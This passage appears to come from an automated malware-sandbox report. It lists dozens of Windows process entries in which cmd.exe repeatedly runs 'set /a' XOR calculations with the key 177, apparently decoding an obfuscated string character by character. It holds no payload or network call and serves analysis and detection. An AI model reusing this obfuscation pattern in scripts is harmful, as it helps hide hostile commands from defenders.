                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:53
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:54
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:55
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:56
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:57
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:58
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:59
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:60
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:61
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:62
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:63
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:64
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:65
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:66
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "201^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:67
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:68
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "137^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:69
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:70
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:71
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:72
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:73
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:74
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:75
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:76
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:77
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:78
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:79
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:80
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:81
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:82
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:83
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:84
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:85
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:86
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:87
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:88
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:89
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:90
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:91
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:92
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:93
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:94
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:95
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:96
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:97
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:98
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "193^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:99
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:100
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:101
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:102
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:103
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:104
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:105
                                                                              Start time:08:44:45
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:106
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:107
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:108
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:109
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:110
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:111
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
